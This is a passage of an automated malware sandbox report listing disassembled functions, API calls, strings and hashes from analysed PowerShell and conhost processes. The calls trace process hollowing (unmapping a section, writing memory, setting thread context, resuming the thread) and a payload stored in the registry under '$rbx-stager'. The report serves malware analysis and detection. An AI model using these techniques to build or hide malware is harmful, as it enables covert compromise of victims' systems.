CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
VariantInit.OLEAUT32(?), ref: 004016EE
CoUninitialize.COMBASE ref: 0040177A
SysFreeString.OLEAUT32(?), ref: 0040178C
SysFreeString.OLEAUT32(00000000), ref: 0040178F

Strings

$rbx-svc32, xrefs: 0040167A, 00401685

Memory Dump Source

Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: $rbx-svc32
API String ID: 4184240511-186198907
Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4

Function 00401986 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
StrStrIW.SHLWAPI(?,Get-Delegate,754A2EB0), ref: 004019D2

Strings

Get-Delegate, xrefs: 00401995, 004019B3, 004019C9

Memory Dump Source

Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_400000_powershell.jbxd

Similarity

API ID: lstrlen
String ID: Get-Delegate
API String ID: 1659193697-1365458365
Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664

Function 00401798 Relevance: 3.0, APIs: 2, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818

ExitProcess.KERNEL32 ref: 0040179E

Memory Dump Source

Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_400000_powershell.jbxd

Similarity

API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
String ID:
API String ID: 3836967525-0
Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
Instruction Fuzzy Hash:

Non-executed Functions

Function 0040118E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3

Strings

ntdll.dll, xrefs: 0040118E
RtlGetVersion, xrefs: 0040119D

Memory Dump Source

Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_400000_powershell.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 1646373207-1489217083
Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C

Analysis Process: powershell.exePID: 1484, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.7%
Total number of Nodes:	155
Total number of Limit Nodes:	4

Executed Functions

Function 00007FFB4B10DF98 Relevance: 1.7, APIs: 1, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36a4d6dea3e41b39b305cc890728233a874e534075a421a5d4abf4d0287f81ba
Instruction ID: 3a1a54c1b467c65ebdc84bebb16ff6a929691b1f776a60f27eab9a9920df3459
Opcode Fuzzy Hash: 36a4d6dea3e41b39b305cc890728233a874e534075a421a5d4abf4d0287f81ba
Instruction Fuzzy Hash: 76510EB290D7844FDB02EB79D8966EA7FB0EF53214F0880FBC589C70A7D964580AC751

Function 00007FFB4B110C5D Relevance: 1.6, APIs: 1, Instructions: 129
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL ref: 00007FFB4B110D27

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: b4c688de711f314f476c876e8f9385cfa1c4902ae01072d8004dacda5ee93b3c
Instruction ID: 77f54a8bec154739ae22c0edb67421c3ca7761512557293b6ca15570b9f67de8
Opcode Fuzzy Hash: b4c688de711f314f476c876e8f9385cfa1c4902ae01072d8004dacda5ee93b3c
Instruction Fuzzy Hash: 0231E47191CA5C8FDB18EF6CD8856F9BBE0FB5A325F04426ED049D3652CB70A806CB81

Function 00007FFB4B10E078 Relevance: 1.6, APIs: 1, Instructions: 122
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFB4B110AFB

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: f9e70d3d55e9377644899a6e0c70ee79f07cfb8dcb1e1f5da4705ebf2833dc05
Instruction ID: 87058237635a0dc9a68febd04b592bf6e908c282e6085edd35aa97843f7a2e25
Opcode Fuzzy Hash: f9e70d3d55e9377644899a6e0c70ee79f07cfb8dcb1e1f5da4705ebf2833dc05
Instruction Fuzzy Hash: 923148B2A0DA4C8FDB48DF68D84A7B97BF0FB55310F04416BD089C3266D6309846CB51

Function 00007FFB4B10E0DA Relevance: 1.6, APIs: 1, Instructions: 119
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL ref: 00007FFB4B110D27

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: b7a1b62359e906909cf374aa5f92389ce228085ba21460595fa831a943e8bf9d
Instruction ID: 103b27a12af03dad71e58e74fa597f736a25ab47910dd4c54a4ca5314a8eff4a
Opcode Fuzzy Hash: b7a1b62359e906909cf374aa5f92389ce228085ba21460595fa831a943e8bf9d
Instruction Fuzzy Hash: C631A07191CA1C8FDB58EF6CD8496F9BBE1FB59321F00422ED44AD3652CB70A8068B85

Function 00007FFB4B110A3E Relevance: 1.6, APIs: 1, Instructions: 116
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFB4B110AFB

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: a8ec931e2f1574c3d2a04766a88bab7ec1013b27296961dcec73935a6aad3bfd
Instruction ID: cd138699853fb267878c03b5b73f69b2c708cc2022701cc06d0233e18bafd06f
Opcode Fuzzy Hash: a8ec931e2f1574c3d2a04766a88bab7ec1013b27296961dcec73935a6aad3bfd
Instruction Fuzzy Hash: 9B31F37090D6888FDB5ADF68D8467A97FE0EF56320F04429BD049C71A2D664A446CB92

Function 00007FFB4B110FE4 Relevance: 1.6, APIs: 1, Instructions: 114
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL ref: 00007FFB4B111095

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e635766ef8a012280ac8ed4e3cb33c7a831842d17affe62388c79a4f3925e635
Instruction ID: 17fc84ad56ac0d9c12f887f683c7b808a28ef253cb964249780e6ae6ccac7bf7
Opcode Fuzzy Hash: e635766ef8a012280ac8ed4e3cb33c7a831842d17affe62388c79a4f3925e635
Instruction Fuzzy Hash: 4831F57190C64C8FDB58DFACD8457EABBE1EF5A310F04416BD409C3292CB709806CB91

Function 00007FFB4B110F20 Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL ref: 00007FFB4B110FAB

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: e55a4faf83a53ff7d4b5479bd4f8f14bc7b8176247e285c8647593223d8d9566
Instruction ID: 50ef359594f9e254826288dd8288a7d430b957ca642a8442ea116ae72f1c7d1b
Opcode Fuzzy Hash: e55a4faf83a53ff7d4b5479bd4f8f14bc7b8176247e285c8647593223d8d9566
Instruction Fuzzy Hash: 0921947190CA4C8FDB58EF6CD8867E97BF0EB5A321F04416BD449C3256C6749846CB91

Function 00007FFB4B10E122 Relevance: 1.6, APIs: 1, Instructions: 96nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 00007FFB4B111095

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 245191588c9b49d49fb907371125fd3202d47842401464699550c12f392e263e
Instruction ID: 70d8b002c5ec1437b566dabf75c8beeb45a84415e3fefc937ca52eecf1ab0386
Opcode Fuzzy Hash: 245191588c9b49d49fb907371125fd3202d47842401464699550c12f392e263e
Instruction Fuzzy Hash: E621BF70A08A0C8FDB58EF9CD849BFEBBE0EB59310F00416BD409D3256CB70A8568B91

Function 00007FFB4B10E102 Relevance: 1.6, APIs: 1, Instructions: 91nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL ref: 00007FFB4B110FAB

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 5971238bc6e7c18256ecd7d0c6e387c147e9c1db6a99ffef1d8827f79af895fd
Instruction ID: 41eb028d870680c46deb67944c3a3705f0a076aa37f4def2bfe9a829ef886666
Opcode Fuzzy Hash: 5971238bc6e7c18256ecd7d0c6e387c147e9c1db6a99ffef1d8827f79af895fd
Instruction Fuzzy Hash: D8217470A0CA1C8FDB58EF9CD84ABF9B7E4EB69321F00416ED44ED3255D670A846CB91

Function 00007FFB4B10E112 Relevance: 1.6, APIs: 1, Instructions: 91nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL ref: 00007FFB4B110FAB

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 5971238bc6e7c18256ecd7d0c6e387c147e9c1db6a99ffef1d8827f79af895fd
Instruction ID: 41eb028d870680c46deb67944c3a3705f0a076aa37f4def2bfe9a829ef886666
Opcode Fuzzy Hash: 5971238bc6e7c18256ecd7d0c6e387c147e9c1db6a99ffef1d8827f79af895fd
Instruction Fuzzy Hash: D8217470A0CA1C8FDB58EF9CD84ABF9B7E4EB69321F00416ED44ED3255D670A846CB91

Function 00007FFB4B1D0002 Relevance: 4.3, Instructions: 4311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2462991396.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b1d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7dca77f34b96b607d1b9a2901e62dc6b00aed7903b1511b3ae6c88fb03033aa
Instruction ID: 11991f85777165b62e3111a5d447feefd45f3323813351fe9a525750d0a1a39a
Opcode Fuzzy Hash: b7dca77f34b96b607d1b9a2901e62dc6b00aed7903b1511b3ae6c88fb03033aa
Instruction Fuzzy Hash: 6E63B071A1CB458FEB68EF28C895A6577E1EBA9704F0545ADD44DC72A2CE30FC41CB82

Function 00007FFB4B1D00DD Relevance: 4.1, Instructions: 4108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2462991396.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b1d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1706fa83c38e235844e4ddbb563edb40b7c247c384508c92150b4cb2f15ac41f
Instruction ID: 9951ac37447eab7a1c00b3169a34b4ff9741c69a8cd491e98d48980a977093cc
Opcode Fuzzy Hash: 1706fa83c38e235844e4ddbb563edb40b7c247c384508c92150b4cb2f15ac41f
Instruction Fuzzy Hash: C553A171A1CB448FEB68EF28D885A6577E1EBA9704F1545ADD44DC72A2CE30FC41CB82

Function 00007FFB4B110221 Relevance: 2.4, APIs: 1, Instructions: 891
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FFB4B11093D

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 41101eecba729b9c238323a4c460504f4868d76c66b39cc4c2e87c4403716cc4
Instruction ID: 1ccba3abf6e325547c823c80f70e6fa7eb531e2c58115a2848c34428a4b487b8
Opcode Fuzzy Hash: 41101eecba729b9c238323a4c460504f4868d76c66b39cc4c2e87c4403716cc4
Instruction Fuzzy Hash: 08D1E47091CA894FDB65EF38D8497F97BE0FF59310F14826BD88DC7292DA34A4458B82

Function 00007FFB4B10EAFA Relevance: 1.7, APIs: 1, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE ref: 00007FFB4B10ECA6

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 447607177f0f1c0622216c216d27aa15d68124854708de61b267b0a62f65a328
Instruction ID: d797d0122c95c4b0fc8e63740ccffda890ba16c922eb21cb5afc705ea5fa82cc
Opcode Fuzzy Hash: 447607177f0f1c0622216c216d27aa15d68124854708de61b267b0a62f65a328
Instruction Fuzzy Hash: 8671D77091CA8D4FDB55EF28C8467E47BE1FF55314F1442AEE84DC72A2DA74E8418B82

Function 00007FFB4B10E8AC Relevance: 1.7, APIs: 1, Instructions: 224
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00007FFB4B10EA39

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8551fc606db352fdd3ca20ae9f3422bbc64d9cc98e09f347f6955cd1508d419e
Instruction ID: f2aa4960af6f9d16a1fb26ebbcda8e0794d9da0c235c6caea455a7db89e6d19d
Opcode Fuzzy Hash: 8551fc606db352fdd3ca20ae9f3422bbc64d9cc98e09f347f6955cd1508d419e
Instruction Fuzzy Hash: DE61D97191CB8D8FEF59EF28C8467E877E0FB59310F14426AE84DC3252DA74E8418B91

Function 00007FFB4B10ED66 Relevance: 1.6, APIs: 1, Instructions: 134
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE ref: 00007FFB4B10EE43

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 9de779f7f48e12887cbed8c0536406553870e3dfc33211d0d8a4e5e3eb2a596a
Instruction ID: 5079400724420203b27aa736487a37261fec08f3ee772726c1d37d8dccdcd925
Opcode Fuzzy Hash: 9de779f7f48e12887cbed8c0536406553870e3dfc33211d0d8a4e5e3eb2a596a
Instruction Fuzzy Hash: AA41497190CA889FDB09EB78D8466E97BF0FF56321F04426ED089C31A2CB746806CB91

Function 00007FFB4B10E7A8 Relevance: 1.6, APIs: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleInformation.KERNEL32 ref: 00007FFB4B10E862

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: cae56d1028d580da5137674e8204790cf3a03d001c3eb5f25677c2590ef2e964
Instruction ID: c50835ddc49e68270688ffda536ee3000393717d1c3e4e025d3978064d07ce01
Opcode Fuzzy Hash: cae56d1028d580da5137674e8204790cf3a03d001c3eb5f25677c2590ef2e964
Instruction Fuzzy Hash: 24311671D0CA4C8FDB08DBACD8456F9BBE1EB55321F04426FD049D3692CB7468068B91

Function 00007FFB4B1D2D2A Relevance: .4, Instructions: 360COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2462991396.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b1d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa9f87aa0f7a2abe3fba2ea5ebe084dee4671a34b6ba491e02951b03cc902da2
Instruction ID: 701aee3dcc48dac81fb621677c4c8eb0b108b886057883418ba1217f6547e0ee
Opcode Fuzzy Hash: aa9f87aa0f7a2abe3fba2ea5ebe084dee4671a34b6ba491e02951b03cc902da2
Instruction Fuzzy Hash: 61A135A291EBCA4FF796EF3CC8542607BD1EF56214B0844FEC498C71A3D919A80AC791

Function 00007FFB4B1D2F47 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2462991396.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b1d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2043089c701fa78c20209fae998bde3f784c23e79c7090283327a113a43a2989
Instruction ID: 6caff6f6f5300773ea076951c314cfb0fe04408f88b614110a214f13cc093f6a
Opcode Fuzzy Hash: 2043089c701fa78c20209fae998bde3f784c23e79c7090283327a113a43a2989
Instruction Fuzzy Hash: E8214CD3A1EB8A0FF7A5AA7CE4553B5AAC0EF55214F0848BED89DC32D2DC0C6C058391

Non-executed Functions

Function 00007FFB4B1036CD Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4104b885858348b41b73eee06f50745b80c244c47ed5b1c1efc368c299ce6436
Instruction ID: 68d8e9ba1da82776e1f86d8d540971aad519bc9c5d91112bcfb337a79f7d2346
Opcode Fuzzy Hash: 4104b885858348b41b73eee06f50745b80c244c47ed5b1c1efc368c299ce6436
Instruction Fuzzy Hash: 94E022D281E7D20EE7536A78A8AF0D43FA0EF0264838800FBC2C44B4B3980B140B4261

Analysis Process: conhost.exePID: 5376, Parent PID: 1484COMMON

Executed Functions

Function 000001FE3A942EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 000001FE3A94302E

Memory Dump Source

Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 2a6e3fdec800ca54c9b53411e3ff9ceb0d2dcee3cb1e590d37e038803082bf72
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 9591267AF0129287DB64CF25E4487BA77D1F758F94F8481389E49A77ACDA38D882C700

Non-executed Functions

Function 000001FE3A94962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001FE3A949689

Part of subcall function 000001FE3A94A544: __GetUnwindTryBlock.LIBCMT ref: 000001FE3A94A587
Part of subcall function 000001FE3A94A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001FE3A94A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001FE3A949761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001FE3A9499AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001FE3A949ABC

Strings

csm, xrefs: 000001FE3A9496A3
csm, xrefs: 000001FE3A94970A
csm, xrefs: 000001FE3A949784

Memory Dump Source

Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 78eefdbdb2e64c758162e426f09b4ca277776b1655114b542b18d5862700ade5
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: D4D16E3AA0478186EB60DF65E4493ED37E4F745B98F104129EE89A7BBADB34C5C1C700

Function 000001FE3A947050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001FE3A947078
__scrt_acquire_startup_lock.LIBCMT ref: 000001FE3A9470CA
_RTC_Initialize.LIBCMT ref: 000001FE3A9470F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001FE3A94711E
__scrt_release_startup_lock.LIBCMT ref: 000001FE3A947149

Memory Dump Source

Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 79cb5ccdbb6cfb2828ee567a8d099af0946b15a2b8904480c75ffa832aed7234
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 5D817239E0068B85FA54EB66BC4A3F926E1BB97F80F44453D9904F77BEDA28C4C58700

Function 000001FE3A949EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001FE3A949ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001FE3A949FBC

Strings

csm, xrefs: 000001FE3A94A00E
csm, xrefs: 000001FE3A949EF6

Memory Dump Source

Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 91c8afd89bac6bac8127caefad83cc524d2f464b8c66448e754d4aae7a6245e8
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: FF518F3AA046C28AEB74CF11A54D3A87BE4F355F94F144139DA99A7BB9CB38C8D0C701

Function 000001FE3A9480A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001FE3A9480CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001FE3A948162

Strings

csm, xrefs: 000001FE3A948149

Memory Dump Source

